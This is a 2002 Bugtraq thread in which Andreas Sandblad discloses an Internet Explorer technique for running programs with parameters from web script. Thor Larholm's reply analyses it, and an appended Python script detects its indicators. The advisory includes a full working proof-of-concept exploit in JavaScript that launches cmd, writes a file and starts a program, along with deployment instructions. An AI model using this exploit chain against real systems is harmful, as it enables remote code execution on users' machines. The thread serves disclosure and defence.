From sandblad@acc.umu.se Sat Nov 9 11:48:59 2002
From: Andreas Sandblad
To: bugtraq@securityfocus.com
Date: Wed, 6 Nov 2002 20:48:03 +0100 (CET)
Subject: How to execute programs with parameters in IE - Sandblad advisory #10

- Sandblad advisory #10 -
----------------------------------------------------------------
Title:    "How to execute programs with parameters in IE"
Date:     [2002-11-06]
Software: Internet Explorer (webbrowser control)
Vendor:   http://www.microsoft.com/
Impact:   Javascript in "Internet zone" may execute programs
          with parameters
                                                       _   _
Author:   Andreas Sandblad, sandblad@acc.umu.se     o' \,=./ `o
                                                       (o o)
---=--=---=--=--=---=--=--=--=--=---=--=--=-----ooO--(_)--Ooo---

TABLE OF CONTENTS:
==================
Introduction ................................................. 1
Vendor status ................................................ 2
Details ...................................................... 3
Exploit ...................................................... 4
Disclaimer ................................................... 5
Feedback ..................................................... 6

(1) INTRODUCTION:
=================
By default all internet content such as homepages is placed in the
"Internet zone". Local content viewed in IE runs in the "Local computer
zone" with fewer restrictions. In the past we have seen many
vulnerabilities where script in the "Internet zone" could access the
"Local computer zone". The script could do actions like:

- Read local files if the exact path is known and the file can be
  opened by IE.
- Execute local programs (exact path required) WITHOUT parameters
  using the codebase attack.

It will be shown in this document how script in the "Local computer
zone" can actually be designed to run arbitrary programs WITH
parameters (exact path not needed). The technique used may open up far
more dangerous attacks than seen before.

(2) VENDOR STATUS:
==================
Microsoft was initially contacted 2002-10-04.
After several mail exchanges, their final response was that the
technique used to run programs with parameters from the "Local computer
zone" was no security vulnerability. A fix should instead be applied
for all possibilities for content in the "Internet zone" to access the
"Local computer zone".

(3) DETAILS:
============
Javascript can use the showHelp command to do one of the following two
operations:

1. Open a local compiled help file (.chm) in a separate winhelp window.
2. Open an url (must begin with http://) in a separate winhelp window.

Script in a window opened as (1) may use the shortcut command (ActiveX
control) to run programs with parameters, but (2) may not. Nothing
strange, normal security restrictions.

After some investigation I found a way to make (2) use the shortcut
command. The following must be done:

3. Script in (2) gets access to the "Local computer zone".
4. Script in (2) changes url to "mk:@MSITStore:C:" or similar.
5. A local compiled help file must have been opened since IE was first
   started. Any help file will do. For example showHelp("iexplore.chm").

In order to achieve (3) there are several nonpatched "cross site/zone
scripting" vulnerabilities to use. To achieve (4) a new window must be
created from (2). By using the "opener" object it is possible to keep
control of the winhelp window (2) even after the url is changed. (5) is
trivial to achieve and will not affect the winhelp window for (2),
since it is opened in a different window by default.

Before MS02-055 was released by Microsoft the above was a lot easier to
perform. (3) and (4) could then be skipped.
(4) EXPLOIT:
============
The exploit uses a nonpatched "cross site/zone scripting" vulnerability
published by Liu Die Yu 2002-10-01 to Bugtraq:
http://online.securityfocus.com/archive/1/293692

It could also be possible to use one of the many "cross site/zone
scripting" vulnerabilities Greymagic found:
http://sec.greymagic.com/adv/gm012-ie/

Recently I reported a new "cross site/zone scripting" vulnerability to
Microsoft that could also be used. But since no patch is yet produced,
information about it will not be published.

In order not to have to put the script in 3 separate files I have
combined them into one single file. The script will check for text
after the # sign in the url to determine what to perform (the url's
hash). If your computer is heavily loaded, then the value of the
setTimeout timer has to be increased. The timer is needed because the
"mk:@MSITStore:C:" url is not set directly by IE.

INSTRUCTIONS:
1. Copy the content below and place it in a html file.
2. REMOVE THE * FROM THE SCRIPT TAG.
3. Place the file on a remote webserver and load it in IE (URL MUST
   START WITH HTTP://).
4. The script will open up a dos window and display a line of text,
   create the file c:/vulnerable.txt (write permission required) and
   start winmine (this excellent game must exist). The help window for
   IE will not be closed.

TESTED: Win2000 pro, XP, IE 6 (latest patches).
--------------------------- CUT HERE ---------------------------
<*script>
// "How to execute programs with parameters in IE", 2002-11-06
// Sandblad advisory #10, Andreas Sandblad, sandblad@acc.umu.se

prog = 'cmd';
args = '/k echo You are vulnerable (Sandblad #10) & '+
       'echo Sandblad #10 > c:/vulnerable.txt & winmine';

if (!location.hash) {
  // First load (no hash): open this page in a winhelp window, i.e.
  // case (2) in the Details section, and open a local help file (5).
  showHelp(location+"#1");
  showHelp("iexplore.chm");
  blur();
}
else if (location.hash == "#1")
  // Running inside the winhelp window: open a new window that keeps
  // a reference back to this one through "opener".
  open(location+"2").blur();
else {
  // Running inside the new window: keep a reference to the winhelp
  // window's assign method, then change its url (step 4).
  f = opener.location.assign;
  opener.location="res:";
  f("javascript:location.replace('mk:@MSITStore:C:')");
  // Increase the delay on a heavily loaded machine.
  setTimeout('run()',1000);
}

function run() {
  f("javascript:document.write('')");
  f("javascript:c1.Click();c2.Click();");
  close();
}
--------------------------- CUT HERE ---------------------------

(5) Disclaimer:
===============
Andreas Sandblad is not responsible for the misuse of the information
provided in this advisory. The opinions expressed are my own and not of
any company. In no event shall the author be liable for any damages
whatsoever arising out of or in connection with the use or spread of
this advisory. Any use of the information is at the user's own risk.

(6) Feedback:
=============
Please send suggestions and comments to:              _   _
sandblad@acc.umu.se                                 o' \,=./ `o
                                                       (o o)
---=--=---=--=--=---=--=--=--=--=---=--=--=-----ooO--(_)--Ooo---
Andreas Sandblad, student in Engineering Physics and Computing Science
at Umea University, Sweden.
-/---/---/---/---/---/---/---/---/---/---/---/---/---/---/---/--

From thor@pivx.com Sat Nov 9 11:56:08 2002
From: Thor Larholm
To: bugtraq@securityfocus.com, Andreas Sandblad
Date: Thu, 7 Nov 2002 10:53:28 +0100
Subject: RE: How to execute programs with parameters in IE - Sandblad advisory #10

Unless I am missing something, this is definitely not a vulnerability
in itself but just a practical demonstration of the "assign method
caching" vulnerability.

Executing programs with or without parameters also becomes pointless
once you have complete access to a local security zone (in this case,
given by the "assign method caching" vuln), as demonstrated by
http-equiv quite a few times. Circumventing the zone barriers allows
you to (among others) retrieve the location of that funny malware you
just planted in the user's temporary internet files, and subsequently
execute it.

The HTMLHelp Control used in this example only has the authority to
execute commands at all because it is being used from a local security
zone. As such, when Microsoft are claiming that "the technique used to
run programs with parameters from the "Local computer zone" was no
security vulnerability", they are in my opinion correct.

Despite this, it is always interesting to have more approaches to
program execution for demonstration purposes once you get your foot
inside the door of a local security zone, especially since the
"codebase localpath" approach is practically filtered anywhere in its
pure form.

IE6 SP1 did include some early attempts at preventing any interaction
between security zones (specifically from the Internet zone to any
local zone). That attempt was broken with the object redirect approach.
It will be interesting to see what Microsoft comes up with next to
prevent interaction between security zones.

Regards

Thor Larholm, Security Researcher
PivX Solutions, LLC
Are You Secure? http://www.PivX.com

-----Original Message-----
From: Andreas Sandblad [mailto:sandblad@acc.umu.se]
Sent: 6. november 2002 20:48
To: bugtraq@securityfocus.com
Subject: How to execute programs with parameters in IE - Sandblad advisory #10
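The indicators that the advisory and Larholm's reply describe (a showHelp() call on a remote or location-derived url, the "mk:@MSITStore:" url scheme, a cached reference to opener.location.assign, and fragment-driven staging of one script file) can be turned into a simple content-filter check for a proxy or mail gateway. The Python script below is an added example written for this page; it is not code from either message. The indicator names, weights and alert threshold are assumptions chosen for illustration, and both HTML samples are constructed: the first keeps only the staging skeleton of the advisory's script with the command payload removed, the second uses the same APIs in the direct way a legitimate help page would.

```python
import re

# Indicators derived from the techniques the advisory and the reply describe.
# Names, weights and ALERT_THRESHOLD are assumptions made for this example.
INDICATORS = [
    # showHelp() opening a remote (http://) or location-derived url: case (2)
    # in the advisory, as opposed to a local .chm.
    ("showhelp_remote_url",
     re.compile(r"""showHelp\s*\(\s*(?:location\b|["']https?://)""", re.I), 2),
    # The url scheme the script switches the winhelp window to (step 4).
    ("msitstore_url",
     re.compile(r"mk:@MSITStore:", re.I), 3),
    # A reference to opener.location.assign taken WITHOUT calling it: the
    # "assign method caching" pattern Larholm names. A direct call
    # opener.location.assign(...) is not matched (negative lookahead).
    ("opener_assign_cached",
     re.compile(r"\bopener\.location\.assign\b(?!\s*\()"), 3),
    # Fragment-driven staging of several roles in one file.
    ("hash_staged_script",
     re.compile(r"\blocation\.hash\b"), 1),
    # HTMLHelp shortcut control invoked through its Click() method.
    ("htmlhelp_click",
     re.compile(r"\.Click\s*\(\s*\)"), 1),
]
ALERT_THRESHOLD = 4


def find_indicators(html):
    """Return a dict mapping each indicator name to its match count."""
    return {name: len(rx.findall(html)) for name, rx, _ in INDICATORS}


def score_html(html):
    """Weighted sum of indicator hits for one HTML document."""
    counts = find_indicators(html)
    return sum(counts[name] * weight for name, _, weight in INDICATORS)


def is_suspicious(html):
    """True when the weighted score reaches the alert threshold."""
    return score_html(html) >= ALERT_THRESHOLD


# Constructed sample: staging skeleton of the advisory's script, payload removed.
SUSPECT_HTML = """<script>
if (!location.hash) {
  showHelp(location + "#1");
  showHelp("iexplore.chm");
} else {
  f = opener.location.assign;
  opener.location = "res:";
  f("javascript:location.replace('mk:@MSITStore:C:')");
}
</script>"""

# Constructed sample: legitimate help and navigation code using the same
# APIs directly (local .chm, assign() called immediately, hash for scrolling).
BENIGN_HTML = """<script>
function openHelp() { showHelp("product.chm"); }
function goHome() { opener.location.assign("/index.html"); }
if (location.hash == "#top") window.scrollTo(0, 0);
</script>"""

if __name__ == "__main__":
    for label, sample in (("suspect", SUSPECT_HTML), ("benign", BENIGN_HTML)):
        hits = {k: v for k, v in find_indicators(sample).items() if v}
        print(label, score_html(sample), is_suspicious(sample), hits)
```

The weights deliberately separate a cached `opener.location.assign` reference from an immediate `opener.location.assign(...)` call, since only the former survives a zone change of the opener window; a single benign `location.hash` test scores well below the threshold, while the staging skeleton alone scores 9 without any command payload being present.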